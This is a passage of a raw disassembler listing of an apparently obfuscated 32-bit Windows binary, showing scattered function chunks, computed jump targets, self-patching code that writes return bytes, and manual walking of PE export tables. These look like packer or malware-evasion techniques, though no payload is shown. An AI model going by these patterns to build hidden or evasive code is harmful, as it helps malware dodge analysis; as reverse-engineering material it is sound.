sub_447EDC proc near ; CODE XREF: ut7h7i2x:0044AFE9p
xchg edi, [esp+0]
pop edi
pop edx
pop eax
call sub_45974E
sub_447EDC endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_447EE7: ; CODE XREF: sub_443BC5+AE52j
jmp loc_452FA0
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
shr esi, 14h
jmp loc_445046
; ---------------------------------------------------------------------------
loc_447EF4: ; CODE XREF: ut7h7i2x:00443F3Fj
mov eax, [ebp+8]
cmp dword ptr [eax-0Ch], 4
jnz loc_451675
add dword ptr [ebp-8], 4
jmp loc_4534FE
; =============== S U B R O U T I N E =======================================
sub_447F0A proc near ; CODE XREF: ut7h7i2x:00447E24j
; sub_455E0B:loc_454F72p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043959D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C203 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E9E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044813D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044EA48 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045126F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00454293 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00456234 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045646D SIZE 00000010 BYTES
xchg ecx, [esp+0]
pop ecx
push 677A61Ah
pop eax
xor eax, 20660008h
loc_447F1A: ; CODE XREF: sub_44FDF2:loc_44912Bj
rol eax, 0Ah
sub eax, 0CE9A745Dh
add eax, 88465A79h
jmp loc_43C203
sub_447F0A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_447F2E: ; CODE XREF: sub_439701:loc_457533j
xor eax, 1A997FFBh
add eax, ebp
add eax, 49CC6BC8h
cmp dword ptr [eax], 47424454h
jz loc_456EB1
jmp loc_4529A7
; END OF FUNCTION CHUNK FOR sub_439701
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_447F4D: ; CODE XREF: sub_43AA94:loc_446616j
mov edx, ds:dword_458530
or edx, edx
jnz loc_458521
jmp loc_446B5D
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E688
loc_447F60: ; CODE XREF: sub_44E688-37F1j
xor ecx, 1626700Ch
popf
xchg ecx, [esp+8+var_8]
push 0
lea eax, [ebp-4]
push eax
call sub_440493
jmp sub_45194F
; END OF FUNCTION CHUNK FOR sub_44E688
; ---------------------------------------------------------------------------
shr esi, 14h
jmp sub_44875F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_447F82: ; CODE XREF: sub_455E0B:loc_4390D3j
; sub_43AED9+F85Dj
popf
xchg ebp, [ecx]
jmp loc_446BA0
; END OF FUNCTION CHUNK FOR sub_43AED9
; =============== S U B R O U T I N E =======================================
sub_447F8A proc near ; CODE XREF: sub_44EEB2:loc_4530A3j
; FUNCTION CHUNK AT 0043ABE2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00448D06 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004515ED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004517DA SIZE 0000001F BYTES
add esp, 0FFFFFFF8h
mov [ebp-4], eax
mov eax, [ebp-4]
mov [ebp-8], eax
jmp loc_43ABE2
sub_447F8A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_447F9B: ; CODE XREF: sub_444273:loc_4519A4j
; sub_444273+D942j
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_44BE5C
jmp loc_4471BC
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_447FAC: ; CODE XREF: sub_441765-4633j
push offset sub_440AF2
jmp loc_43FB30
; END OF FUNCTION CHUNK FOR sub_441765
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_61. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_447FB7: ; CODE XREF: sub_450FDE-11950j
mov edx, 0BDDFE11Fh
push 4ECCAB50h
jmp loc_451AAA
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
loc_447FC6: ; CODE XREF: ut7h7i2x:0043EAACj
jz loc_443A4A
jmp loc_4478A0
; ---------------------------------------------------------------------------
locret_447FD1: ; CODE XREF: ut7h7i2x:loc_43E3E9j
retn
; ---------------------------------------------------------------------------
loc_447FD2: ; CODE XREF: ut7h7i2x:004555C9j
jb loc_43B4D1
xchg eax, ebx
add esi, 14A6B96Ah
jmp loc_43ED64
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_446. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BE93
loc_447FE6: ; CODE XREF: sub_43BE93+C4A4j
jmp nullsub_304
; END OF FUNCTION CHUNK FOR sub_43BE93
; ---------------------------------------------------------------------------
locret_447FEB: ; CODE XREF: ut7h7i2x:loc_44689Cj
; ut7h7i2x:0044778Fj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B19
loc_447FEC: ; CODE XREF: sub_456B19+3000j
jmp loc_443079
; END OF FUNCTION CHUNK FOR sub_456B19
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459485
loc_447FF1: ; CODE XREF: sub_459485+1Cj
jmp loc_44336B
; END OF FUNCTION CHUNK FOR sub_459485
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_447FF6: ; CODE XREF: sub_43A556+6F8j
jmp loc_446A2D
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459DE7
loc_447FFB: ; CODE XREF: sub_459DE7:loc_4469A2j
; sub_440493+8611j
rol eax, 6
push eax
call sub_454196
retn
; END OF FUNCTION CHUNK FOR sub_459DE7
; =============== S U B R O U T I N E =======================================
sub_448005 proc near ; CODE XREF: sub_4524FE-7415p
push esi
sub_448005 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_448006: ; CODE XREF: sub_43DD17:loc_45A031j
mov esi, ebp
jmp loc_45750D
; END OF FUNCTION CHUNK FOR sub_43DD17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44640F
loc_44800D: ; CODE XREF: sub_44640F:loc_44C48Dj
mov eax, [eax]
push eax
push edi
push 0F9B99CBDh
pop edi
jmp loc_45919B
; END OF FUNCTION CHUNK FOR sub_44640F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_44801C: ; CODE XREF: ut7h7i2x:0043CA4Aj
; sub_44F43B:loc_43DE82j
jg loc_449DC7
shl eax, 5
; END OF FUNCTION CHUNK FOR sub_44F43B
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_448025: ; CODE XREF: sub_43CA2D:loc_43CA38j
add eax, 0F4FABF89h
add eax, ebp
jmp loc_44EE1E
; END OF FUNCTION CHUNK FOR sub_43CA2D
; ---------------------------------------------------------------------------
loc_448032: ; CODE XREF: ut7h7i2x:0045386Fj
jnz loc_43C42D
jmp loc_43B6B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44668A
loc_44803D: ; CODE XREF: sub_44668A+7j
mov ebp, eax
xchg ebp, [esp+4+var_4]
push edx
push 900291E8h
jmp loc_44E799
; END OF FUNCTION CHUNK FOR sub_44668A
; ---------------------------------------------------------------------------
adc ecx, esi
mov edi, eax
jmp sub_43C3B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FD5
loc_448056: ; CODE XREF: sub_449FD5:loc_443763j
and eax, 0F1CF7A7Dh
test eax, 6454239Eh
jmp loc_44FC13
; END OF FUNCTION CHUNK FOR sub_449FD5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A92F
loc_448067: ; CODE XREF: sub_43A92F+Ej
pop edx
pushf
push 0B705735Eh
pop eax
and eax, 0A7E45995h
xor eax, 57CAE29Dh
add eax, ebp
jmp loc_43CDF6
; END OF FUNCTION CHUNK FOR sub_43A92F
; ---------------------------------------------------------------------------
loc_448082: ; CODE XREF: ut7h7i2x:0044B677j
pop ecx
mov esi, [eax]
push eax
mov eax, ecx
jmp loc_43BADA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_77. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jns loc_453968
jmp sub_449DFF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_448099: ; CODE XREF: sub_446320+E10Ej
xchg ecx, esi
loc_44809B: ; CODE XREF: sub_446320:loc_44FDBFj
mov eax, 0DD960900h
call sub_43AA94
sub eax, 0AAD5E8EFh
rol eax, 1Bh
xor eax, 45874D7Dh
jmp loc_4593B8
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
mov ecx, [edi]
or ecx, 7F0E5EC5h
jmp sub_44082D
; ---------------------------------------------------------------------------
loc_4480C6: ; CODE XREF: ut7h7i2x:loc_43C396j
pop eax
push eax
push eax
push 0EEE35314h
jmp loc_445624
; ---------------------------------------------------------------------------
loc_4480D3: ; CODE XREF: ut7h7i2x:0044BA99j
pushf
test ebp, edi
jmp loc_451924
; ---------------------------------------------------------------------------
shl eax, 8
jmp sub_44DB79
; ---------------------------------------------------------------------------
loc_4480E3: ; CODE XREF: ut7h7i2x:0045787Ej
rol ebx, 11h
cmp ebx, 826C5840h
jmp loc_43D76C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_168. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4480F2: ; CODE XREF: ut7h7i2x:00450D4Cj
jmp loc_456484
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_4480F7: ; CODE XREF: sub_452D3D-CEDDj
mov edi, eax
xchg edi, [esp+4+var_4]
push ebp
mov ebp, eax
xchg ebp, [esp+8+var_8]
jmp loc_442E11
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
loc_448107: ; CODE XREF: ut7h7i2x:00453CE1j
mov edx, ds:dword_444420
or edx, edx
jnz loc_43B787
jmp loc_441B6C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E6B4
loc_44811A: ; CODE XREF: sub_44E6B4:loc_456B9Ej
jnz loc_442206
jmp loc_451D1D
; END OF FUNCTION CHUNK FOR sub_44E6B4
; ---------------------------------------------------------------------------
test al, al
jz loc_446390
jmp loc_44032C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_448132: ; CODE XREF: sub_447EB5:loc_44A1B9j
jnz loc_451E24
jmp loc_4441B1
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447F0A
loc_44813D: ; CODE XREF: sub_447F0A+6B46j
push 0ACE43392h
loc_448142: ; CODE XREF: sub_447F0A:loc_43959Dj
call sub_439A43
loc_448147: ; CODE XREF: ut7h7i2x:00459261j
jmp loc_456234
; END OF FUNCTION CHUNK FOR sub_447F0A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_44814C: ; CODE XREF: sub_4549F0-1303j
jmp loc_45AA31
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_448151: ; CODE XREF: sub_44DB48+57A9j
jmp sub_458BED
; END OF FUNCTION CHUNK FOR sub_44DB48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B45E
loc_448156: ; CODE XREF: sub_44B45E+Ej
jmp loc_45A508
; END OF FUNCTION CHUNK FOR sub_44B45E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B43D
loc_44815B: ; CODE XREF: sub_44B43D+Ej
jmp loc_43D8B3
; END OF FUNCTION CHUNK FOR sub_44B43D
; ---------------------------------------------------------------------------
adc edx, 0D4B5C042h
jmp loc_43F248
; ---------------------------------------------------------------------------
mov eax, 8FB3D7EFh
jmp loc_43BB7F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_304. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B67
loc_448176: ; CODE XREF: sub_439B67+609Fj
rol eax, 1
and eax, 10EE545Eh
xor eax, 1E8D9F9Fh
jns loc_444FF8
; END OF FUNCTION CHUNK FOR sub_439B67
; START OF FUNCTION CHUNK FOR sub_44825D
loc_44818A: ; CODE XREF: sub_44825D+9j
jmp loc_43C949
; END OF FUNCTION CHUNK FOR sub_44825D
; ---------------------------------------------------------------------------
rol ebp, 11h
jmp loc_44052E
; ---------------------------------------------------------------------------
adc eax, 0DFD5B95Bh
jmp sub_43A0DA
; =============== S U B R O U T I N E =======================================
sub_4481A2 proc near ; CODE XREF: ut7h7i2x:0043E435j
; sub_449217+1777p
; FUNCTION CHUNK AT 00447384 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044774B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044779F SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044C063 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C195 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00451E35 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004531AD SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
or ecx, ecx
jz loc_44774B
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jmp loc_4531AD
sub_4481A2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456F4
loc_4481B9: ; CODE XREF: sub_4456F4:loc_450B8Fj
; ut7h7i2x:00450BB9j
add eax, 7F640046h
mov eax, [eax]
loc_4481C1: ; CODE XREF: ut7h7i2x:loc_44820Dj
or eax, eax
jnz loc_4540F9
jmp loc_43D384
; END OF FUNCTION CHUNK FOR sub_4456F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F0B0
loc_4481CE: ; CODE XREF: sub_43F0B0+Bj
pop edx
add edx, 0B1D3E75Eh
xor edx, 0A95E4EE8h
add edx, ebp
add edx, 2F9131C5h
jmp loc_43FECD
; END OF FUNCTION CHUNK FOR sub_43F0B0
; ---------------------------------------------------------------------------
dword_4481E8 dd 0 ; DATA XREF: sub_449FD5+49FCr
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4551D3
loc_4481EC: ; CODE XREF: sub_4551D3-1044Cj
jmp loc_45AD3A
; END OF FUNCTION CHUNK FOR sub_4551D3
; ---------------------------------------------------------------------------
db 0E5h, 0C1h, 0A8h
dword_4481F4 dd 0 ; DATA XREF: ut7h7i2x:loc_442CE6w
; sub_44CAB9+3r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_4481F8: ; CODE XREF: sub_444EAA-79A6j
jmp loc_44DA49
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
db 1Dh, 0E6h, 0B3h
dword_448200 dd 0 ; DATA XREF: sub_449B8E+6r
; ut7h7i2x:00456CD7w
dword_448204 dd 0 ; DATA XREF: sub_447F0A+E333w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_448208: ; CODE XREF: sub_439BF8+26EDj
jmp loc_459F0E
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_44820D: ; CODE XREF: ut7h7i2x:00456034j
jg loc_4481C1
adc ebp, esi
; =============== S U B R O U T I N E =======================================
sub_448215 proc near ; CODE XREF: sub_43CD08-1703p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043B2CC SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004416BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004418E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DE54 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451B25 SIZE 0000001E BYTES
xchg ecx, [esp+0]
pop ecx
jmp loc_4416BE
sub_448215 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455EA7
loc_44821E: ; CODE XREF: sub_455EA7+15j
call sub_44B87B
; END OF FUNCTION CHUNK FOR sub_455EA7
; START OF FUNCTION CHUNK FOR sub_4519D2
loc_448223: ; CODE XREF: sub_4550FF-1B73Cj
; sub_4550FF-1544Cj ...
jno loc_43D9FE
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jz loc_44509D
loc_448238: ; CODE XREF: sub_4462B0+B563j
jmp loc_4468D5
; END OF FUNCTION CHUNK FOR sub_4519D2
; ---------------------------------------------------------------------------
jmp ds:dword_41D108
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_364. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
or dl, 0Ch
add [eax], eax
pop edx
mov eax, [esp]
jmp loc_44FAF5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_540. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449DC4
loc_448253: ; CODE XREF: sub_449DC4+D250j
jmp loc_44C00F
; END OF FUNCTION CHUNK FOR sub_449DC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_448258: ; CODE XREF: sub_439701+8j
jmp loc_451585
; END OF FUNCTION CHUNK FOR sub_439701
; =============== S U B R O U T I N E =======================================
sub_44825D proc near ; CODE XREF: sub_450EFA-13782p
; ut7h7i2x:0045900Ej
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439131 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043C8F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C949 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043CFD6 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0043D5FD SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043F4CA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00440A2F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442F6C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446D9E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044729E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044818A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449D82 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A223 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A843 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00452435 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045287B SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045AD27 SIZE 00000008 BYTES
xchg esi, [esp+0]
pop esi
xchg esi, [esp+0]
mov ebp, esp
jmp loc_44818A
sub_44825D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D082
loc_44826B: ; CODE XREF: sub_44D082:loc_456ED6j
pop ebx
; END OF FUNCTION CHUNK FOR sub_44D082
; START OF FUNCTION CHUNK FOR sub_456177
loc_44826C: ; CODE XREF: sub_456177:loc_43B080j
push ecx
push offset loc_442A88
jmp nullsub_431
; END OF FUNCTION CHUNK FOR sub_456177
; ---------------------------------------------------------------------------
loc_448277: ; CODE XREF: ut7h7i2x:0045A44Fj
or edx, eax
jmp loc_4518E2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_44827E: ; CODE XREF: sub_457A66:loc_454F91j
rol edi, 9
add edi, 2095100Eh
xchg edi, [esp+4+var_4]
jmp sub_454196
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
lea eax, [ebp-14h]
push eax
push eax
push 0F4798D4h
pop eax
sub eax, 0B963CB41h
rol eax, 1Ah
jmp loc_44EF3F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_88. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4482A9: ; CODE XREF: ut7h7i2x:004486D1j
jmp loc_44C41A
; =============== S U B R O U T I N E =======================================
sub_4482AE proc near ; CODE XREF: ut7h7i2x:00441B67j
; sub_447CBE:loc_450B39p
; FUNCTION CHUNK AT 00439063 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
lea eax, sub_453FFB
mov byte ptr [eax], 0C3h
jmp loc_439063
sub_4482AE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4482C0 proc near ; CODE XREF: sub_41946E+3Cp
; sub_41946E+43p ...
call sub_4482D0
jmp ds:off_41D1F0
sub_4482C0 endp
; ---------------------------------------------------------------------------
loc_4482CB: ; CODE XREF: ut7h7i2x:00450128j
jmp loc_449BB4
; =============== S U B R O U T I N E =======================================
sub_4482D0 proc near ; CODE XREF: sub_4482C0p
; sub_44668A:loc_44E7A3j ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0044A6C6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044AD43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458E03 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004591EF SIZE 0000000B BYTES
jnb loc_4591EF
xchg eax, [esp+0]
jmp loc_44A6C6
sub_4482D0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
ror edx, 19h
rol edx, 11h
jmp sub_43C9F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_4482E9: ; CODE XREF: sub_44D1F0+2E2Dj
test ebp, edi
jmp loc_4489A1
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
loc_4482F0: ; CODE XREF: ut7h7i2x:0044E108j
and esi, edi
xchg esi, [eax]
jmp loc_450D3C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_4482F9: ; CODE XREF: sub_44A3BB:loc_44BD00j
jbe loc_446390
jmp loc_44F810
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4595BE
loc_448304: ; CODE XREF: sub_4595BE-91D4j
mov byte ptr [eax], 0C3h
jmp loc_445EEF
; END OF FUNCTION CHUNK FOR sub_4595BE
; =============== S U B R O U T I N E =======================================
sub_44830C proc near ; CODE XREF: sub_41B9D6+20p
; sub_41BBD8+43p ...
call sub_448321
jmp ds:off_41D10C
sub_44830C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_448317: ; CODE XREF: sub_44A3BB-4013j
jmp nullsub_241
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_44831C: ; CODE XREF: sub_43F1B2+1414j
jmp loc_44C96F
; END OF FUNCTION CHUNK FOR sub_43F1B2
; =============== S U B R O U T I N E =======================================
sub_448321 proc near ; CODE XREF: sub_44830Cp
; sub_456F1D-7B3Aj ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004396CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439D2D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B47E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043B520 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043C863 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043E38D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044014E SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044183F SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044306E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446923 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00446B00 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004470E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447B99 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044874D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448AC7 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004498E2 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00449FC4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A530 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044DA9F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044DFE6 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044E4EE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EE32 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F3E8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004503EF SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045080A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450994 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452F28 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00456A5F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00459201 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459617 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A7BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045ACEB SIZE 00000005 BYTES
pop edx
jmp loc_44DA9F
sub_448321 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_448327: ; CODE XREF: sub_45341C-89EEj
jz loc_43E3B7
jmp loc_4501E2
; END OF FUNCTION CHUNK FOR sub_45341C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BE93
loc_448332: ; CODE XREF: sub_43BE93+7j
; ut7h7i2x:loc_453AB7j
push offset loc_45A454
jmp loc_447FE6
; END OF FUNCTION CHUNK FOR sub_43BE93
; ---------------------------------------------------------------------------
loc_44833C: ; CODE XREF: ut7h7i2x:00441073j
pushf
loc_44833D: ; CODE XREF: ut7h7i2x:loc_44104Cj
xor edx, 4DC41D22h
and edx, 0F25BA1B2h
add edx, 40004FCAh
mov [edx], eax
jmp loc_455D15
; ---------------------------------------------------------------------------
jns loc_442D48
jmp loc_459DE1
; ---------------------------------------------------------------------------
locret_448361: ; CODE XREF: ut7h7i2x:loc_44F815j
retn
; ---------------------------------------------------------------------------
loc_448362: ; CODE XREF: ut7h7i2x:loc_45030Ej
jmp loc_44E744
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B45E
loc_448367: ; CODE XREF: sub_44B45E-5B1Bj
jmp loc_446F48
; END OF FUNCTION CHUNK FOR sub_44B45E
; ---------------------------------------------------------------------------
loc_44836C: ; CODE XREF: ut7h7i2x:004530E4j
test edi, 0DD58C230h
jmp loc_459DA9
; ---------------------------------------------------------------------------
loc_448377: ; CODE XREF: ut7h7i2x:004469C8j
jb sub_44F300
test ebp, ecx
jmp loc_441872
; ---------------------------------------------------------------------------
loc_448384: ; CODE XREF: ut7h7i2x:0044C81Fj
jb loc_44AA8B
popf
jmp loc_45297F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453D8B
loc_448390: ; CODE XREF: sub_453D8B+1Ej
add eax, 23CD59EAh
push esi
mov esi, edx
xchg esi, [esp+0]
push 6F77803Ah
pop edx
jmp loc_44E228
; END OF FUNCTION CHUNK FOR sub_453D8B
; ---------------------------------------------------------------------------
ror eax, 0Ah
jmp sub_446B2B
; ---------------------------------------------------------------------------
loc_4483AF: ; CODE XREF: ut7h7i2x:loc_45566Cj
pop eax
pop ecx
pop ebx
xchg esi, [esp]
mov ebp, esi
push offset sub_456D5F
jmp loc_441C29
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442E76
loc_4483C1: ; CODE XREF: sub_442E76+6j
xchg ebp, [esp+8+var_8]
mov edx, ebp
pop ebp
mov eax, [esp+4+var_4]
loc_4483CA: ; CODE XREF: sub_43B7F7:loc_45793Cj
push esi
jmp loc_45AE36
; END OF FUNCTION CHUNK FOR sub_442E76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_4483D0: ; CODE XREF: sub_4503C3:loc_443EDDj
cmp ebx, 197F3903h
jmp loc_44B945
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446B90
loc_4483DB: ; CODE XREF: sub_446B90-38ABj
sub esi, 8B3D829Ch
and esi, 0ABBE45Ch
add esi, 307A0328h
add esi, ebp
add esi, 0CF039C94h
jmp loc_4531A0
; END OF FUNCTION CHUNK FOR sub_446B90
; ---------------------------------------------------------------------------
locret_4483FA: ; CODE XREF: ut7h7i2x:loc_443CDCj
retn
; ---------------------------------------------------------------------------
loc_4483FB: ; CODE XREF: ut7h7i2x:004527ACj
jmp locret_4396C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_448400: ; CODE XREF: sub_43AA94+11346j
jmp loc_43AB3F
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
